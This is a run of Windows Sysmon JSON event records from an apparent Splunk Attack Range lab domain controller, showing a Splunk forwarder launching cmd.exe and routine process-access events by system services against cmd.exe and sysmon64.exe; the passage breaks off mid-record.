{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3909,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.108\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-001083AF0500}\r\nProcessId: 5036\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.108","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-001083AF0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3910,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001083AF0500}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001083AF0500}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3911,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001083AF0500}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001083AF0500}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3912,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3913,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3914,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3915,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3916,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3917,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 